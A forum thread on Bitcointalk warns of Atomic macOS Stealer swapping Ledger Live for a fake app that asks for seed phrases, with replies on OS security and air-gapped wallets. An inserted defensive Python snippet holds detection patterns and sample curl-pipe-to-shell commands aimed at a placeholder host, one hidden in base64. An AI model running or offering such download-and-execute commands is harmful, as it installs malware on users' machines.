Pmalek (OP)
Legendary
Offline
Activity: 3290
Merit: 8680
|
There is a new scam that targets Ledger and Ledger Live users on macOS. It's a phishing campaign meant to get victims' recovery phrases and steal their crypto. Most malware is created for Windows but users of other OS's must also be careful. A person can get infected with an Atomic macOS Stealer malware from close to 3000 hacked websites. If that happens, the malware will look for the genuine Ledger Live app on your computer. If it finds it, the malware will uninstall Ledger Live and replace it with a fake and malicious app. When you run this software, you will see a pop-up notifying you of “suspicious activity” and "critical errors." To fix the problem and recover your coins, the app will ask you to enter your seed phrase. You know what happens if you do. Your wallets will be drained and the scammers will steal all they can. Take good care of your seeds and keys! More information is available below: https://x.com/BitcoinNewsCom/status/1926755303283978477
|
|
|
|
Churchillvv
|
 |
May 27, 2025, 08:46:43 AM |
|
Years back a lot of people claimed macOS was immune to phishing attacks, but recently it has proved otherwise: the internet generally isn't a safe place; instead personal care is more important, especially for us who deal with crypto and bitcoin.
This fake Ledger Live app has been discussed before, if I can remember, but it was targeting Windows only; today it's more like general attacks, so we just have to be careful. Probably an airgapped device for a cold wallet will be better so we don't come in contact with these phishing attacks.
|
|
|
|
Aanuoluwatofunmi
|
 |
May 27, 2025, 09:43:23 AM |
|
Years back a lot of people claimed macOS was immune to phishing attacks, but recently it has proved otherwise: the internet generally isn't a safe place; instead personal care is more important, especially for us who deal with crypto and bitcoin.
Even if it once happened like that, not anymore this time around, because scammers are also advancing more in their evil ways and they can penetrate anything they wish to. The only way for us to be safe is when we achieve the maximum security measures from our end, so we don't get engaged with malicious links, phishing sites and anything that could render us vulnerable to attack.
|
|
|
|
Findingnemo
Legendary
Offline
Activity: 2856
Merit: 1033
Leading Crypto Sports Betting & Casino Platform
|
 |
May 27, 2025, 01:08:24 PM |
|
It's a reminder to anyone who thinks that I am using Mac and iOS so I am completely safe from malware. No one is safe when they are in the space (online), so they must keep looking for the pitfalls, or better, just don't install any apps from websites too often. Regarding crypto, Ledger is fcuked up for a while so I wonder if anyone is still using it? Deserve to get phished...
|
|
|
|
hd49728
Legendary
Offline
Activity: 2618
Merit: 1246
|
 |
May 27, 2025, 01:54:04 PM |
|
It's a reminder to anyone who thinks that I am using Mac and iOS so I am completely safe from malware.
An operating system is not able to secure users if users are careless. From Windows, macOS to Linux, there are bad people and attackers who want to do their "dark" jobs of stealing sensitive information and money from other people. You are only safe if you are careful with your practice, are knowledgeable about security that helps your practice enhancement, and, if possible, manage to have AV software on your devices. The first and most important protection layer is your carefulness, nothing else.
|
|
|
|
|
|
|
promise444c5
|
 |
May 27, 2025, 02:04:00 PM |
|
It's a reminder to anyone who thinks that I am using Mac and iOS so I am completely safe from malware.
No operating system is completely safe from malware, and macOS is no exception, but it is at least better than Windows, which faces tens of thousands of malware threats. While there are also some common Trojans for macOS, their number is minute compared to those found on Windows, likely due to Windows' larger global usage. As more and more people start to use macOS, it could draw more attention from attackers, yet users are often the first point of vulnerability... if they avoid risky behaviors, they are far less likely to be affected.
|
|
|
|
Findingnemo
Legendary
Offline
Activity: 2856
Merit: 1033
Leading Crypto Sports Betting & Casino Platform
|
 |
May 27, 2025, 02:29:33 PM |
|
It's a reminder to anyone who thinks that I am using Mac and iOS so I am completely safe from malware.
No operating system is completely safe from malware, and macOS is no exception, but it is at least better than Windows, which faces tens of thousands of malware threats.
This is what I am talking about: Windows is affected mostly because more apps are available for people to download, which includes the OS itself, so piracy is what makes the platform vulnerable, not the actual one. Anyway, as you and others said, no OS is safe; we ought to keep ourselves secured in every possible way, but the fact is we can never be sure because some attacks are so complicated that we only know when attackers are asking for ransom. That's why: don't take chances, move to an airgapped device so that you can be sure it's safe.
|
|
|
|
rdluffy
Legendary
Offline
Activity: 2758
Merit: 1776
|
I had already heard something about this AMOS macOS Stealer. Look at the image of the “advertisement” for this malware:
Source: https://www.kandji.io/blog/amos-macos-stealer-analysis
The part that mentions the main wallets is quite scary.
I still don't understand how this malware manages to uninstall one program and install another on top of it. Wouldn't it trigger any permissions in macOS before making these changes?
|
|
|
|
Pmalek (OP)
Legendary
Offline
Activity: 3290
Merit: 8680
|
 |
May 27, 2025, 03:24:29 PM |
|
Years back a lot of people claimed macOS was immune to phishing attacks, but recently it has proved otherwise: the internet generally isn't a safe place; instead personal care is more important, especially for us who deal with crypto and bitcoin.
Linux and Mac systems are generally thought of as being more secure than Windows. Overall that's true. Windows has way too many vulnerabilities and vectors of attack. But this is also a question of which operating system is worth more to attack and spend time customizing attacks. 8 and perhaps 9/10 computers run Windows worldwide. Scam artists are more likely to get the results they desire from the OS that's mostly used. It's a larger attack surface.
I still don't understand how this malware manages to uninstall one program and install another on top of it. Wouldn't it trigger any permissions in macOS before making these changes?
No idea brother. Perhaps the victim gives the malware all the permissions it needs unknowingly when it interacts with it and gets the computer infected.
|
|
|
|
Forsyth Jones
Legendary
Offline
Activity: 1694
Merit: 1690
I love Bitcoin!
|
The part that mentions the main wallets is quite scary. I still don't understand how this malware manages to uninstall one program and install another on top of it. Wouldn't it trigger any permissions in macOS before making these changes?
That's not all: the part of the code that infects Ledger Live and makes it prompt for mnemonic words can be avoided, but the malware scans the user's computer in search of their passwords, sensitive information saved in the browser... I wonder, some people usually take photos of the backup wallet containing the mnemonic words or even in a notepad... A complete disaster. The best way to avoid this type of malware is to avoid downloading cracked software and files from shady sites. If the user operates the PC conscientiously, the chances of getting malware are drastically reduced.
|
|
|
|
m2017
Legendary
Offline
Activity: 2282
Merit: 1508
keep walking, Johnnie
|
 |
May 27, 2025, 04:46:33 PM |
|
There is a new scam that targets Ledger and Ledger Live users on macOS. It's a phishing campaign meant to get victims' recovery phrases and steal their crypto. Most malware is created for Windows but users of other OS's must also be careful.
But can't do that with Linux. This is a hint about which OS to use when using crypto.
A person can get infected with an Atomic macOS Stealer malware from close to 3000 hacked websites. If that happens, the malware will look for the genuine Ledger Live app on your computer. If it finds it, the malware will uninstall Ledger Live and replace it with a fake and malicious app. When you run this software, you will see a pop-up notifying you of “suspicious activity” and "critical errors." To fix the problem and recover your coins, the app will ask you to enter your seed phrase.
Cleverly conceived, there is no other way to say it. Many will surely fall for this trap. Is it possible to limit the rights of the user's account on Mac OS to exclude the possibility of malicious programs without the participation of the user of the replace program? This malicious program seems to be behaving like it owns the place.
|
|
|
|
|
|
|
Pmalek (OP)
Legendary
Offline
Activity: 3290
Merit: 8680
|
 |
May 28, 2025, 07:08:39 AM |
|
The best way to avoid this type of malware is to avoid downloading cracked software and files from shady sites.
If the user operates the PC conscientiously, the chances of getting malware are drastically reduced.
Exactly. Unless you are cautious and have a healthy dosage of paranoia in you that prevents you from clicking around and downloading everything you see online, your computers will stay clean and malware-free. You can at least separate your most important activities, like dealing with money, and keep it compartmentalized on a safe PC and do other stuff on a different computer if you have to.
Is it possible to limit the rights of the user's account on Mac OS to exclude the possibility of malicious programs without the participation of the user of the replace program? This malicious program seems to be behaving like it owns the place.
But what if the malware can make it seem like it's the user that gave it the needed rights by successfully replicating and pretending to be him/her? Everything is fine then.
|
|
|
|
dkbit98
Legendary
Offline
Activity: 2758
Merit: 8268
Trêvoid █ No KYC-AML Crypto Swaps
|
 |
May 28, 2025, 09:05:55 PM |
|
There are two simple solutions to avoid getting this malware:
1. Stop using closed source Windows OS
2. Stop using closed source Ledger hardware wallets.
Temporary solution could also be to uninstall Ledger Live app; a hardware wallet can still be used with third party and native wallets, but you won't be able to update firmware.
|
|
|
|
justinlamode
Full Member
 
Offline
Activity: 532
Merit: 159
The secret to happiness is making others happy
|
 |
May 28, 2025, 10:23:31 PM |
|
It's a reminder to anyone who thinks that I am using Mac and iOS so I am completely safe from malware.
This is more like an end to an era. In other words, no one is immune from phishing and other forms of attack irrespective of the device you are using. I have friends that once boasted of being 100% secured due to their gadgets, but this new development is an eye opener to all that it has become more of safe practice than reliant on gadgets.
No one is safe when they are in the space (online), so they must keep looking for the pitfalls, or better, just don't install any apps from websites too often. Regarding crypto, Ledger is fcuked up for a while so I wonder if anyone is still using it? Deserve to get phished...
Where is the safe place to install apps from at this point, because there was emphasis to use only official sites to download apps? I know there has been serious focus on Ledger by scammers, which makes it a bit scary to even use.
|
|
|
|
Davidvictorson
|
 |
May 28, 2025, 11:24:16 PM |
|
Yea, take good care of your seeds. It used to be Windows and not the untouchables are not touchable. No one is spared from the possibility of a malware attack. Download the original software from the official websites. Have updated antivirus/antimalware software and, more often, scan your computer. And yes, scan your computer without an internet connection.
|
|
|
|
Darker45
Legendary
Offline
Activity: 3108
Merit: 2057
Matud Nila
|
 |
May 29, 2025, 02:16:34 AM |
|
If anybody buys a Ledger and is serious, responsible, and careful enough in making sure he/she's safe every step of the way, he/she would easily avoid falling to this scam.
We aren't short of reminders and warnings not to enter our seed phrase anywhere, except perhaps directly on the device itself. For some reason, users end up entering their seed phrase on an app or a link, form, site, chat with an official support staff, whatever.
The warning isn't rocket science. It's simply saying not to enter the seed phrase anywhere. What's so hard to understand about that?
|
|
|
|
|
|
|
SFR10
Legendary
Offline
Activity: 3528
Merit: 3822
|
I still don't understand how this malware manages to uninstall one program and install another on top of it. Wouldn't it trigger any permissions in macOS before making these changes?
I'll try to simplify it: On a compromised site, they'll use one of those fake CAPTCHAs that ask users to prove they're not a robot > users will click on the "I'm not a robot" box to complete it, but by doing that, it'll trigger a Binance smart contract that delivers a command to the clipboard [responsible for downloading & installing the malware] > On the next step [verification window], they'll ask users to run a certain command in Terminal and by doing that, they'll be running the script for them.
- For more information, refer to this blog post: Over 2,800 hacked websites are infecting Macs with Atomic Stealer
|
|
|
|
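The paste-and-run step described in the post above can be checked before anything reaches Terminal. The following is an added example, not code from the thread or the linked blog post: a Python triage function that flags download-and-execute shapes in copied text, including one hidden inside base64. The rule set, function names and sample commands are assumptions constructed for illustration; they are generic shapes, not indicators taken from this campaign.

```python
"""Added example: triage text copied from a web page before running it in Terminal."""
import base64
import binascii
import re

# Interpreters that can execute whatever text they are handed.
INTERP = r"((ba|z|k)?sh|python3?|perl|ruby|osascript)"

# (label, pattern) pairs. These are generic shapes chosen for this example.
RULES = [
    ("downloads from the network", re.compile(r"\b(curl|wget)\b")),
    ("pipes data into an interpreter", re.compile(r"\|\s*(sudo\s+)?" + INTERP + r"\b")),
    ("runs an inline script", re.compile(r"\b" + INTERP + r"\s+-(c|e)\b")),
    ("decodes embedded data", re.compile(r"\bbase64\s+(-d|-D|--decode)\b")),
    ("asks for elevated rights", re.compile(r"\bsudo\b")),
]

B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
SUFFIX = " (inside encoded data)"


def _decoded_blobs(text):
    """Yield readable text recovered from base64 runs embedded in the command."""
    for blob in B64_RUN.findall(text):
        padded = blob + "=" * (-len(blob) % 4)
        try:
            decoded = base64.b64decode(padded, validate=True).decode("utf-8")
        except (binascii.Error, ValueError):  # not base64, or not text
            continue
        if all(ch.isprintable() or ch in "\n\t" for ch in decoded):
            yield decoded


def assess(command, _depth=0):
    """Return a sorted list of reasons the pasted command deserves a closer look."""
    reasons = {label for label, rx in RULES if rx.search(command)}
    if _depth < 2:  # follow at most two layers of encoding
        for inner in _decoded_blobs(command):
            for reason in assess(inner, _depth + 1):
                reasons.add(reason if reason.endswith(SUFFIX) else reason + SUFFIX)
    return sorted(reasons)


def verdict(command):
    """'block' when the text both fetches and executes; 'review' on any other finding."""
    reasons = assess(command)
    fetches = any(r.startswith("downloads") for r in reasons)
    executes = any(r.startswith(("pipes", "runs an inline")) for r in reasons)
    if fetches and executes:
        return "block"
    return "review" if reasons else "no findings"


# Constructed sample inputs (example.invalid never resolves).
_INNER = "curl -s https://files.example.invalid/a | sh"
SAMPLES = {
    "direct": "curl -fsSL https://files.example.invalid/verify.sh | bash",
    "encoded": "echo " + base64.b64encode(_INNER.encode()).decode() + " | base64 -d | bash",
    "benign": "ls -la ~/Downloads",
}

if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        print(f"{name:8} {verdict(cmd):12} {assess(cmd)}")
```

On macOS the text to check can be taken from the clipboard with `pbpaste` and passed to `verdict()` instead of being pasted into a shell.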
Pmalek (OP)
Legendary
Offline
Activity: 3290
Merit: 8680
|
 |
May 29, 2025, 06:45:26 AM |
|
There are two simple solutions to avoid getting this malware: 1. Stop using closed source Windows OS
This is not a Windows problem. It's a malware that targets and attacks macOS, not Windows users.
Temporary solution could also be to uninstall Ledger Live app,
If a malware can be configured to replicate Ledger Live and try to trick Ledger users, it can also be made to replicate other software, like Trezor Suite, etc. The brand isn't important here. Ledger wasn't chosen because it's closed-source but because scammers know that there are more people using Ledger than other hardware wallet brands. They attack there where they believe there are the greatest odds to succeed.
This is more like an end to an era. In other words, no one is immune from phishing and other forms of attack irrespective of the device you are using. I have friends that once boasted of being 100% secured due to their gadgets, but this new development is an eye opener to all that it has become more of safe practice than reliant on gadgets.
Nothing changes. You are still safe. This isn't a hack where some scammers have devised a way to steal from you without your input and knowledge. It's social engineering where the user sends them their keys because they were tricked. Don't get tricked. How often have you given your physical wallet to a stranger on the street who asked for it? My guess is 0.
Where is the safe place to install apps from at this point, because there was emphasis to use only official sites to download apps?
It's still from official sources and making sure you verify the signatures and authenticity of the software to be certain it came from their development team.
|
|
|
|
satscraper
Legendary
Offline
Activity: 1260
Merit: 2231
|
 |
May 29, 2025, 06:57:05 AM Last edit: May 29, 2025, 07:09:49 AM by satscraper |
|
Notorious Ledger's subscription-based cloud service for backing up SEED phrases via Ledger Live proves that it's technically possible to extract SEEDs from users' devices. They are already doing this for users who have subscribed to their backup service, but this mechanism opens the door to potential abuse by attackers, no matter who they are, simply because if Ledger Live can interact with a device in this way and the device itself allows such kind of interaction, it's reasonable to assume that malicious actors could eventually reverse-engineer and clone the app to extract SEEDs from unsuspecting users. This is especially concerning because many users assume that once they’ve downloaded Ledger Live from an official source it remains secure indefinitely. But as we see from the current development, it’s possible for malware to silently replace the legitimate app with clones that look identical. Currently, most attacks over LL clones trick users into manually entering their SEED on a fake page. But the concern is that, in time, even this interaction with the user may not be necessary for a clone to extract the SEED. For those with more technical background, feel free to read the specifics of the current Ledger Live clones over there.
P.S. I personally can no longer recommend using devices from Ledger HW line and their software.
|
|
|
|
KiaKia
|
 |
May 29, 2025, 10:45:34 AM |
|
I use a computer a lot, to surf the web and do other things, and what I have learnt in the past years is that you can't be too careful using a computer. Windows OS, for example, is vulnerable; even with the inbuilt Windows Security app, you are still likely to get caught in the trojan web.
The only way is to avoid Internet connections on your computer, but why then do you buy a computer when you can't access the web? Even antivirus can't save you most of the time, so it ends in a last stop.
The last stop is getting everything money and asset related off your computer, and you will be safe even if there are invisible trojans on your computer. Get a standalone open source hardware wallet that doesn't need some app to work.
These types of hardware wallets are called airgapped for this reason: they are always offline, and they are already like a phone with a full HD screen where you can make your transactions with no need to download an extra app or connect to a computer.
|
|
|
|
|